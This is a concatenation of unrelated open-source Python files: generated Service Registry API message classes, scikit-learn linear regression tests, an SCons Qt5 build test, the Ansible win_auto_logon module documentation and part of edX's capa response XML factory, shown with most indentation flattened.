nextPageToken: [Output Only] This token allows you to get the next page of
results for list requests. If the number of results is larger than
maxResults, use the nextPageToken as a value for the query parameter
pageToken in the next list request. Subsequent list requests will have
their own nextPageToken to continue paging through the results.
"""
endpoints = _messages.MessageField('Endpoint', 1, repeated=True)
nextPageToken = _messages.StringField(2)
class Operation(_messages.Message):
"""An Operation resource, used to manage asynchronous API requests.
Messages:
ErrorValue: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
WarningsValueListEntry: A WarningsValueListEntry object.
Fields:
clientOperationId: [Output Only] Reserved for future use.
creationTimestamp: [Deprecated] This field is deprecated.
description: [Output Only] A textual description of the operation, which
is set when the operation is created.
endTime: [Output Only] The time that this operation was completed. This
value is in RFC3339 text format.
error: [Output Only] If errors are generated during processing of the
operation, this field will be populated.
httpErrorMessage: [Output Only] If the operation fails, this field
contains the HTTP error message that was returned, such as NOT FOUND.
httpErrorStatusCode: [Output Only] If the operation fails, this field
contains the HTTP error status code that was returned. For example, a
404 means the resource was not found.
id: [Output Only] The unique identifier for the resource. This identifier
is defined by the server.
insertTime: [Output Only] The time that this operation was requested. This
value is in RFC3339 text format.
kind: [Output Only] Type of the resource. Always compute#operation for
Operation resources.
name: [Output Only] Name of the resource.
operationType: [Output Only] The type of operation, such as insert,
update, or delete, and so on.
progress: [Output Only] An optional progress indicator that ranges from 0
to 100. There is no requirement that this be linear or support any
granularity of operations. This should not be used to guess when the
operation will be complete. This number should monotonically increase as
the operation progresses.
region: [Output Only] The URL of the region where the operation resides.
Only available when performing regional operations.
selfLink: [Output Only] Server-defined URL for the resource.
startTime: [Output Only] The time that this operation was started by the
server. This value is in RFC3339 text format.
status: [Output Only] The status of the operation, which can be one of the
following: PENDING, RUNNING, or DONE.
statusMessage: [Output Only] An optional textual description of the
current status of the operation.
targetId: [Output Only] The unique target ID, which identifies a specific
incarnation of the target resource.
targetLink: [Output Only] The URL of the resource that the operation
modifies. For operations related to creating a snapshot, this points to
the persistent disk that the snapshot was created from.
user: [Output Only] User who requested the operation, for example:
[email protected].
warnings: [Output Only] If warning messages are generated during
processing of the operation, this field will be populated.
zone: [Output Only] The URL of the zone where the operation resides. Only
available when performing per-zone operations.
"""
class ErrorValue(_messages.Message):
"""[Output Only] If errors are generated during processing of the
operation, this field will be populated.
Messages:
ErrorsValueListEntry: A ErrorsValueListEntry object.
Fields:
errors: [Output Only] The array of errors encountered while processing
this operation.
"""
class ErrorsValueListEntry(_messages.Message):
"""A ErrorsValueListEntry object.
Fields:
code: [Output Only] The error type identifier for this error.
location: [Output Only] Indicates the field in the request that caused
the error. This property is optional.
message: [Output Only] An optional, human-readable error message.
"""
code = _messages.StringField(1)
location = _messages.StringField(2)
message = _messages.StringField(3)
errors = _messages.MessageField('ErrorsValueListEntry', 1, repeated=True)
class WarningsValueListEntry(_messages.Message):
"""A WarningsValueListEntry object.
Messages:
DataValueListEntry: A DataValueListEntry object.
Fields:
code: [Output Only] A warning code, if applicable. For example, Compute
Engine returns NO_RESULTS_ON_PAGE if there are no results in the
response.
data: [Output Only] Metadata about this warning in key: value format.
For example: "data": [ { "key": "scope", "value": "zones/us-east1-d" }
message: [Output Only] A human-readable description of the warning code.
"""
class DataValueListEntry(_messages.Message):
"""A DataValueListEntry object.
Fields:
key: [Output Only] A key that provides more detail on the warning
being returned. For example, for warnings where there are no results
in a list request for a particular zone, this key might be scope and
the key value might be the zone name. Other examples might be a key
indicating a deprecated resource and a suggested replacement, or a
warning about invalid network settings (for example, if an instance
attempts to perform IP forwarding but is not enabled for IP
forwarding).
value: [Output Only] A warning data value corresponding to the key.
"""
key = _messages.StringField(1)
value = _messages.StringField(2)
code = _messages.StringField(1)
data = _messages.MessageField('DataValueListEntry', 2, repeated=True)
message = _messages.StringField(3)
clientOperationId = _messages.StringField(1)
creationTimestamp = _messages.StringField(2)
description = _messages.StringField(3)
endTime = _messages.StringField(4)
error = _messages.MessageField('ErrorValue', 5)
httpErrorMessage = _messages.StringField(6)
httpErrorStatusCode = _messages.IntegerField(7, variant=_messages.Variant.INT32)
id = _messages.IntegerField(8, variant=_messages.Variant.UINT64)
insertTime = _messages.StringField(9)
kind = _messages.StringField(10, default=u'serviceregistry#operation')
name = _messages.StringField(11)
operationType = _messages.StringField(12)
progress = _messages.IntegerField(13, variant=_messages.Variant.INT32)
region = _messages.StringField(14)
selfLink = _messages.StringField(15)
startTime = _messages.StringField(16)
status = _messages.StringField(17)
statusMessage = _messages.StringField(18)
targetId = _messages.IntegerField(19, variant=_messages.Variant.UINT64)
targetLink = _messages.StringField(20)
user = _messages.StringField(21)
warnings = _messages.MessageField('WarningsValueListEntry', 22, repeated=True)
zone = _messages.StringField(23)
class OperationsListResponse(_messages.Message):
"""A response containing a partial list of operations and a page token used
to build the next request if the request has been truncated.
Fields:
nextPageToken: [Output Only] A token used to continue a truncated list
request.
operations: [Output Only] Operations contained in this list response.
"""
nextPageToken = _messages.StringField(1)
operations = _messages.MessageField('Operation', 2, repeated=True)
class ServiceregistryEndpointsDeleteRequest(_messages.Message):
"""A ServiceregistryEndpointsDeleteRequest object.
Fields:
endpoint: The name of the endpoint for this request.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsGetRequest(_messages.Message):
"""A ServiceregistryEndpointsGetRequest object.
Fields:
endpoint: The name of the endpoint for this request.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsInsertRequest(_messages.Message):
"""A ServiceregistryEndpointsInsertRequest object.
Fields:
endpoint: A Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.MessageField('Endpoint', 1)
project = _messages.StringField(2, required=True)
class ServiceregistryEndpointsListRequest(_messages.Message):
"""A ServiceregistryEndpointsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
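# Illustrative sketch (not part of the generated API surface): constructing a
# list request that uses the filter syntax documented above. The project ID and
# filter value below are hypothetical placeholders.
def _example_endpoints_list_request():
  """Build a sample ServiceregistryEndpointsListRequest (assumed usage)."""
  return ServiceregistryEndpointsListRequest(
      project='my-project',  # hypothetical project ID
      filter='name ne example-endpoint',  # RE2 literal match, negated with ne
      maxResults=100)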
class ServiceregistryEndpointsPatchRequest(_messages.Message):
"""A ServiceregistryEndpointsPatchRequest object.
Fields:
endpoint: The name of the endpoint for this request.
    endpointResource: An Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
endpointResource = _messages.MessageField('Endpoint', 2)
project = _messages.StringField(3, required=True)
class ServiceregistryEndpointsUpdateRequest(_messages.Message):
"""A ServiceregistryEndpointsUpdateRequest object.
Fields:
endpoint: The name of the endpoint for this request.
    endpointResource: An Endpoint resource to be passed as the request body.
project: The project ID for this request.
"""
endpoint = _messages.StringField(1, required=True)
endpointResource = _messages.MessageField('Endpoint', 2)
project = _messages.StringField(3, required=True)
class ServiceregistryOperationsGetRequest(_messages.Message):
"""A ServiceregistryOperationsGetRequest object.
Fields:
operation: The name of the operation for this request.
project: The project ID for this request.
"""
operation = _messages.StringField(1, required=True)
project = _messages.StringField(2, required=True)
class ServiceregistryOperationsListRequest(_messages.Message):
"""A ServiceregistryOperationsListRequest object.
Fields:
filter: Sets a filter expression for filtering listed resources, in the
form filter={expression}. Your {expression} must be in the format:
field_name comparison_string literal_string. The field_name is the name
of the field you want to compare. Only atomic field types are supported
(string, number, boolean). The comparison_string must be either eq
(equals) or ne (not equals). The literal_string is the string value to
filter to. The literal value must be valid for the type of field you are
filtering by (string, number, boolean). For string fields, the literal
value is interpreted as a regular expression using RE2 syntax. The
literal value must match the entire field. For example, to filter for
instances that do not have a name of example-instance, you would use
filter=name ne example-instance. You can filter on nested fields. For
example, you could filter on instances that have set the
scheduling.automaticRestart field to true. Use filtering on nested
fields to take advantage of labels to organize and search for results
based on label values. To filter on multiple expressions, provide each
separate expression within parentheses. For example,
(scheduling.automaticRestart eq true) (zone eq us-central1-f). Multiple
expressions are treated as AND expressions, meaning that resources must
match all expressions to pass the filters.
maxResults: The maximum number of results per page that should be
returned. If the number of available results is larger than maxResults,
Compute Engine returns a nextPageToken that can be used to get the next
page of results in subsequent list requests. Acceptable values are 0 to
500, inclusive. (Default: 500)
orderBy: Sorts list results by a certain order. By default, results are
returned in alphanumerical order based on the resource name. You can
also sort results in descending order based on the creation timestamp
using orderBy="creationTimestamp desc". This sorts results based on the
creationTimestamp field in reverse chronological order (newest result
first). Use this to sort resources like operations so that the newest
operation is returned first. Currently, only sorting by name or
creationTimestamp desc is supported.
pageToken: Specifies a page token to use. Set pageToken to the
nextPageToken returned by a previous list request to get the next page
of results.
project: The project ID for this request.
"""
filter = _messages.StringField(1)
maxResults = _messages.IntegerField(2, variant=_messages.Variant.UINT32, default=500)
orderBy = _messages.StringField(3)
pageToken = _messages.StringField(4)
project = _messages.StringField(5, required=True)
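# Illustrative pagination sketch (not generated code): walking every page of an
# operations list call by following pageToken/nextPageToken as documented
# above. `client` and its `operations.List` method are assumed to come from an
# apitools-generated service client, which is not part of this module.
def _example_list_all_operations(client, project):
  """Yield every Operation for `project`, following nextPageToken."""
  token = None
  while True:
    request = ServiceregistryOperationsListRequest(
        project=project, pageToken=token)
    response = client.operations.List(request)  # an OperationsListResponse
    for operation in response.operations:
      yield operation
    token = response.nextPageToken
    if not token:
      break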
class StandardQueryParameters(_messages.Message):
"""Query parameters accepted by all methods.
Enums:
AltValueValuesEnum: Data format for the response.
Fields:
alt: Data format for the response.
fields: Selector specifying which fields to include in a partial response.
key: API key. Your API key identifies your project and provides you with
API access, quota, and reports. Required unless you provide an OAuth 2.0
token.
oauth_token: OAuth 2.0 token for the current user.
prettyPrint: Returns response with indentations and line breaks.
quotaUser: Available to use for quota purposes for server-side
applications. Can be any arbitrary string assigned to a user, but should
not exceed 40 characters. Overrides userIp if both are provided.
trace: A tracing token of the form "token:<tokenid>" to include in api
requests.
userIp: IP address of the site where the request originates. Use this if
you want to enforce per-user limits.
"""
class AltValueValuesEnum(_messages.Enum):
"""Data format for the response.
Values:
json: Responses with Content-Type of application/json
"""
json = 0
alt = _messages.EnumField('AltValueValuesEnum', 1, default=u'json')
fields = _messages.StringField(2)
key = _messages.StringField(3)
oauth_token = _messages.StringField(4)
prettyPrint = _messages.BooleanField(5, default=True)
quotaUser = _messages.StringField(6)
trace = _messages.StringField(7)
userIp = _messages.StringField(8)
| mit |
ltiao/scikit-learn | sklearn/linear_model/tests/test_base.py | 101 | 12205 | # Author: Alexandre Gramfort <[email protected]>
# Fabian Pedregosa <[email protected]>
#
# License: BSD 3 clause
import numpy as np
from scipy import sparse
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_equal
from sklearn.linear_model.base import LinearRegression
from sklearn.linear_model.base import center_data, sparse_center_data, _rescale_data
from sklearn.utils import check_random_state
from sklearn.utils.testing import assert_raise_message
from sklearn.utils.testing import assert_greater
from sklearn.datasets.samples_generator import make_sparse_uncorrelated
from sklearn.datasets.samples_generator import make_regression
def test_linear_regression():
# Test LinearRegression on a simple dataset.
# a simple dataset
X = [[1], [2]]
Y = [1, 2]
clf = LinearRegression()
clf.fit(X, Y)
assert_array_almost_equal(clf.coef_, [1])
assert_array_almost_equal(clf.intercept_, [0])
assert_array_almost_equal(clf.predict(X), [1, 2])
# test it also for degenerate input
X = [[1]]
Y = [0]
clf = LinearRegression()
clf.fit(X, Y)
assert_array_almost_equal(clf.coef_, [0])
assert_array_almost_equal(clf.intercept_, [0])
assert_array_almost_equal(clf.predict(X), [0])
def test_linear_regression_sample_weights():
rng = np.random.RandomState(0)
for n_samples, n_features in ((6, 5), (5, 10)):
y = rng.randn(n_samples)
X = rng.randn(n_samples, n_features)
sample_weight = 1.0 + rng.rand(n_samples)
clf = LinearRegression()
clf.fit(X, y, sample_weight)
coefs1 = clf.coef_
assert_equal(clf.coef_.shape, (X.shape[1], ))
assert_greater(clf.score(X, y), 0.9)
assert_array_almost_equal(clf.predict(X), y)
# Sample weight can be implemented via a simple rescaling
# for the square loss.
scaled_y = y * np.sqrt(sample_weight)
scaled_X = X * np.sqrt(sample_weight)[:, np.newaxis]
        clf.fit(scaled_X, scaled_y)
coefs2 = clf.coef_
assert_array_almost_equal(coefs1, coefs2)
def test_raises_value_error_if_sample_weights_greater_than_1d():
# Sample weights must be either scalar or 1D
n_sampless = [2, 3]
n_featuress = [3, 2]
rng = np.random.RandomState(42)
for n_samples, n_features in zip(n_sampless, n_featuress):
X = rng.randn(n_samples, n_features)
y = rng.randn(n_samples)
sample_weights_OK = rng.randn(n_samples) ** 2 + 1
sample_weights_OK_1 = 1.
sample_weights_OK_2 = 2.
clf = LinearRegression()
# make sure the "OK" sample weights actually work
clf.fit(X, y, sample_weights_OK)
clf.fit(X, y, sample_weights_OK_1)
clf.fit(X, y, sample_weights_OK_2)
def test_fit_intercept():
# Test assertions on betas shape.
X2 = np.array([[0.38349978, 0.61650022],
[0.58853682, 0.41146318]])
X3 = np.array([[0.27677969, 0.70693172, 0.01628859],
[0.08385139, 0.20692515, 0.70922346]])
y = np.array([1, 1])
lr2_without_intercept = LinearRegression(fit_intercept=False).fit(X2, y)
lr2_with_intercept = LinearRegression(fit_intercept=True).fit(X2, y)
lr3_without_intercept = LinearRegression(fit_intercept=False).fit(X3, y)
lr3_with_intercept = LinearRegression(fit_intercept=True).fit(X3, y)
assert_equal(lr2_with_intercept.coef_.shape,
lr2_without_intercept.coef_.shape)
assert_equal(lr3_with_intercept.coef_.shape,
lr3_without_intercept.coef_.shape)
assert_equal(lr2_without_intercept.coef_.ndim,
lr3_without_intercept.coef_.ndim)
def test_linear_regression_sparse(random_state=0):
"Test that linear regression also works with sparse data"
random_state = check_random_state(random_state)
for i in range(10):
n = 100
X = sparse.eye(n, n)
beta = random_state.rand(n)
y = X * beta[:, np.newaxis]
ols = LinearRegression()
ols.fit(X, y.ravel())
assert_array_almost_equal(beta, ols.coef_ + ols.intercept_)
assert_array_almost_equal(ols.residues_, 0)
def test_linear_regression_multiple_outcome(random_state=0):
"Test multiple-outcome linear regressions"
X, y = make_regression(random_state=random_state)
Y = np.vstack((y, y)).T
n_features = X.shape[1]
clf = LinearRegression(fit_intercept=True)
    clf.fit(X, Y)
assert_equal(clf.coef_.shape, (2, n_features))
Y_pred = clf.predict(X)
clf.fit(X, y)
y_pred = clf.predict(X)
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T, Y_pred, decimal=3)
def test_linear_regression_sparse_multiple_outcome(random_state=0):
"Test multiple-outcome linear regressions with sparse data"
random_state = check_random_state(random_state)
X, y = make_sparse_uncorrelated(random_state=random_state)
X = sparse.coo_matrix(X)
Y = np.vstack((y, y)).T
n_features = X.shape[1]
ols = LinearRegression()
ols.fit(X, Y)
assert_equal(ols.coef_.shape, (2, n_features))
Y_pred = ols.predict(X)
ols.fit(X, y.ravel())
y_pred = ols.predict(X)
assert_array_almost_equal(np.vstack((y_pred, y_pred)).T, Y_pred, decimal=3)
def test_center_data():
n_samples = 200
n_features = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
expected_X_mean = np.mean(X, axis=0)
# XXX: currently scaled to variance=n_samples
expected_X_std = np.std(X, axis=0) * np.sqrt(X.shape[0])
expected_y_mean = np.mean(y, axis=0)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=False,
normalize=False)
assert_array_almost_equal(X_mean, np.zeros(n_features))
assert_array_almost_equal(y_mean, 0)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X)
assert_array_almost_equal(yt, y)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=False)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X - expected_X_mean)
assert_array_almost_equal(yt, y - expected_y_mean)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=True)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt, (X - expected_X_mean) / expected_X_std)
assert_array_almost_equal(yt, y - expected_y_mean)
def test_center_data_multioutput():
n_samples = 200
n_features = 3
n_outputs = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples, n_outputs)
expected_y_mean = np.mean(y, axis=0)
args = [(center_data, X), (sparse_center_data, sparse.csc_matrix(X))]
for center, X in args:
_, yt, _, y_mean, _ = center(X, y, fit_intercept=False,
normalize=False)
assert_array_almost_equal(y_mean, np.zeros(n_outputs))
assert_array_almost_equal(yt, y)
_, yt, _, y_mean, _ = center(X, y, fit_intercept=True,
normalize=False)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(yt, y - y_mean)
_, yt, _, y_mean, _ = center(X, y, fit_intercept=True,
normalize=True)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(yt, y - y_mean)
def test_center_data_weighted():
n_samples = 200
n_features = 2
rng = check_random_state(0)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
sample_weight = rng.rand(n_samples)
expected_X_mean = np.average(X, axis=0, weights=sample_weight)
expected_y_mean = np.average(y, axis=0, weights=sample_weight)
# XXX: if normalize=True, should we expect a weighted standard deviation?
# Currently not weighted, but calculated with respect to weighted mean
# XXX: currently scaled to variance=n_samples
expected_X_std = (np.sqrt(X.shape[0]) *
np.mean((X - expected_X_mean) ** 2, axis=0) ** .5)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=False,
sample_weight=sample_weight)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt, X - expected_X_mean)
assert_array_almost_equal(yt, y - expected_y_mean)
Xt, yt, X_mean, y_mean, X_std = center_data(X, y, fit_intercept=True,
normalize=True,
sample_weight=sample_weight)
assert_array_almost_equal(X_mean, expected_X_mean)
assert_array_almost_equal(y_mean, expected_y_mean)
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt, (X - expected_X_mean) / expected_X_std)
assert_array_almost_equal(yt, y - expected_y_mean)
def test_sparse_center_data():
n_samples = 200
n_features = 2
rng = check_random_state(0)
# random_state not supported yet in sparse.rand
X = sparse.rand(n_samples, n_features, density=.5) # , random_state=rng
X = X.tolil()
y = rng.rand(n_samples)
XA = X.toarray()
# XXX: currently scaled to variance=n_samples
expected_X_std = np.std(XA, axis=0) * np.sqrt(X.shape[0])
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=False,
normalize=False)
assert_array_almost_equal(X_mean, np.zeros(n_features))
assert_array_almost_equal(y_mean, 0)
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt.A, XA)
assert_array_almost_equal(yt, y)
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=True,
normalize=False)
assert_array_almost_equal(X_mean, np.mean(XA, axis=0))
assert_array_almost_equal(y_mean, np.mean(y, axis=0))
assert_array_almost_equal(X_std, np.ones(n_features))
assert_array_almost_equal(Xt.A, XA)
assert_array_almost_equal(yt, y - np.mean(y, axis=0))
Xt, yt, X_mean, y_mean, X_std = sparse_center_data(X, y,
fit_intercept=True,
normalize=True)
assert_array_almost_equal(X_mean, np.mean(XA, axis=0))
assert_array_almost_equal(y_mean, np.mean(y, axis=0))
assert_array_almost_equal(X_std, expected_X_std)
assert_array_almost_equal(Xt.A, XA / expected_X_std)
assert_array_almost_equal(yt, y - np.mean(y, axis=0))
def test_csr_sparse_center_data():
# Test output format of sparse_center_data, when input is csr
X, y = make_regression()
X[X < 2.5] = 0.0
csr = sparse.csr_matrix(X)
csr_, y, _, _, _ = sparse_center_data(csr, y, True)
assert_equal(csr_.getformat(), 'csr')
def test_rescale_data():
n_samples = 200
n_features = 2
rng = np.random.RandomState(0)
sample_weight = 1.0 + rng.rand(n_samples)
X = rng.rand(n_samples, n_features)
y = rng.rand(n_samples)
rescaled_X, rescaled_y = _rescale_data(X, y, sample_weight)
rescaled_X2 = X * np.sqrt(sample_weight)[:, np.newaxis]
rescaled_y2 = y * np.sqrt(sample_weight)
assert_array_almost_equal(rescaled_X, rescaled_X2)
assert_array_almost_equal(rescaled_y, rescaled_y2)
| bsd-3-clause |
mbychawski/traffic-simulator | site_scons/site_tools/qt5/test/basic/CPPPATH/CPPPATH/sconstest-CPPPATH.py | 2 | 1765 | #!/usr/bin/env python
#
# Copyright (c) 2001-2010,2011,2012 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
"""
Test that CPPPATH works with generated files.
In the SConscript we really add the necessary path, such that
the compile run is successful. See also the accompanying test
that is supposed to fail.
"""
import os.path
import TestSCons
test = TestSCons.TestSCons()
test.dir_fixture('image')
test.file_fixture('SConscript-after','SConscript')
test.file_fixture('../../../qtenv.py')
test.file_fixture('../../../../__init__.py','site_scons/site_tools/qt5/__init__.py')
test.run(stderr=None)
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| bsd-3-clause |
HyperBaton/ansible | lib/ansible/modules/windows/win_auto_logon.py | 10 | 2142 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright: (c) 2019, Prasoon Karunan V (@prasoonkarunan)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: win_auto_logon
short_description: Adds or Sets auto logon registry keys.
description:
- Used to apply auto logon registry setting.
version_added: "2.10"
options:
logon_count:
description:
- The number of times to do an automatic logon.
    - This count is decremented by Windows every time an automatic logon is
performed.
- Once the count reaches C(0) then the automatic logon process is
disabled.
type: int
username:
description:
- Username to login automatically.
- Must be set when C(state=present).
- This can be the Netlogon or UPN of a domain account and is
automatically parsed to the C(DefaultUserName) and C(DefaultDomainName)
registry properties.
type: str
password:
description:
- Password to be used for automatic login.
- Must be set when C(state=present).
- Value of this input will be used as password for I(username).
- While this value is encrypted by LSA it is decryptable to any user who
is an Administrator on the remote host.
type: str
state:
description:
- Whether the registry key should be C(present) or C(absent).
type: str
choices: [ absent, present ]
default: present
author:
- Prasoon Karunan V (@prasoonkarunan)
'''
EXAMPLES = r'''
- name: Set autologon for user1
win_auto_logon:
username: User1
password: str0ngp@ssword
- name: Set autologon for abc.com\user1
win_auto_logon:
username: abc.com\User1
password: str0ngp@ssword
- name: Remove autologon for user1
win_auto_logon:
state: absent
- name: Set autologon for user1 with a limited logon count
win_auto_logon:
username: User1
password: str0ngp@ssword
logon_count: 5
'''
RETURN = r'''
#
'''
| gpl-3.0 |
LICEF/edx-platform | common/lib/capa/capa/tests/response_xml_factory.py | 47 | 34688 | from lxml import etree
from abc import ABCMeta, abstractmethod
class ResponseXMLFactory(object):
""" Abstract base class for capa response XML factories.
Subclasses override create_response_element and
create_input_element to produce XML of particular response types"""
__metaclass__ = ABCMeta
@abstractmethod
def create_response_element(self, **kwargs):
""" Subclasses override to return an etree element
representing the capa response XML
(e.g. <numericalresponse>).
The tree should NOT contain any input elements
(such as <textline />) as these will be added later."""
return None
@abstractmethod
def create_input_element(self, **kwargs):
""" Subclasses override this to return an etree element
representing the capa input XML (such as <textline />)"""
return None
def build_xml(self, **kwargs):
""" Construct an XML string for a capa response
based on **kwargs.
**kwargs is a dictionary that will be passed
to create_response_element() and create_input_element().
See the subclasses below for other keyword arguments
you can specify.
For all response types, **kwargs can contain:
*question_text*: The text of the question to display,
wrapped in <p> tags.
*explanation_text*: The detailed explanation that will
be shown if the user answers incorrectly.
*script*: The embedded Python script (a string)
*num_responses*: The number of responses to create [DEFAULT: 1]
*num_inputs*: The number of input elements
to create [DEFAULT: 1]
Returns a string representation of the XML tree.
"""
        # Retrieve keyword arguments
question_text = kwargs.get('question_text', '')
explanation_text = kwargs.get('explanation_text', '')
script = kwargs.get('script', None)
num_responses = kwargs.get('num_responses', 1)
num_inputs = kwargs.get('num_inputs', 1)
# The root is <problem>
root = etree.Element("problem")
# Add a script if there is one
if script:
script_element = etree.SubElement(root, "script")
script_element.set("type", "loncapa/python")
script_element.text = str(script)
# The problem has a child <p> with question text
question = etree.SubElement(root, "p")
question.text = question_text
# Add the response(s)
for i in range(0, int(num_responses)):
response_element = self.create_response_element(**kwargs)
root.append(response_element)
# Add input elements
for j in range(0, int(num_inputs)):
input_element = self.create_input_element(**kwargs)
            if input_element is not None:
response_element.append(input_element)
# The problem has an explanation of the solution
if explanation_text:
explanation = etree.SubElement(root, "solution")
explanation_div = etree.SubElement(explanation, "div")
explanation_div.set("class", "detailed-solution")
explanation_div.text = explanation_text
return etree.tostring(root)
@staticmethod
def textline_input_xml(**kwargs):
""" Create a <textline/> XML element
Uses **kwargs:
*math_display*: If True, then includes a MathJax display of user input
*size*: An integer representing the width of the text line
"""
math_display = kwargs.get('math_display', False)
size = kwargs.get('size', None)
input_element = etree.Element('textline')
if math_display:
input_element.set('math', '1')
if size:
input_element.set('size', str(size))
return input_element
@staticmethod
def choicegroup_input_xml(**kwargs):
""" Create a <choicegroup> XML element
Uses **kwargs:
*choice_type*: Can be "checkbox", "radio", or "multiple"
*choices*: List of True/False values indicating whether
a particular choice is correct or not.
Users must choose *all* correct options in order
to be marked correct.
DEFAULT: [True]
        *choice_names*: List of strings identifying the choices.
If specified, you must ensure that
len(choice_names) == len(choices)
"""
# Names of group elements
group_element_names = {'checkbox': 'checkboxgroup',
'radio': 'radiogroup',
'multiple': 'choicegroup'}
# Retrieve **kwargs
choices = kwargs.get('choices', [True])
choice_type = kwargs.get('choice_type', 'multiple')
choice_names = kwargs.get('choice_names', [None] * len(choices))
# Create the <choicegroup>, <checkboxgroup>, or <radiogroup> element
assert(choice_type in group_element_names)
group_element = etree.Element(group_element_names[choice_type])
# Create the <choice> elements
for (correct_val, name) in zip(choices, choice_names):
choice_element = etree.SubElement(group_element, "choice")
choice_element.set("correct", "true" if correct_val else "false")
# Add a name identifying the choice, if one exists
# For simplicity, we use the same string as both the
# name attribute and the text of the element
if name:
choice_element.text = str(name)
choice_element.set("name", str(name))
return group_element
class NumericalResponseXMLFactory(ResponseXMLFactory):
""" Factory for producing <numericalresponse> XML trees """
def create_response_element(self, **kwargs):
""" Create a <numericalresponse> XML element.
Uses **kwarg keys:
*answer*: The correct answer (e.g. "5")
*tolerance*: The tolerance within which a response
is considered correct. Can be a decimal (e.g. "0.01")
or percentage (e.g. "2%")
"""
answer = kwargs.get('answer', None)
tolerance = kwargs.get('tolerance', None)
response_element = etree.Element('numericalresponse')
if answer:
if isinstance(answer, float):
response_element.set('answer', repr(answer))
else:
response_element.set('answer', str(answer))
if tolerance:
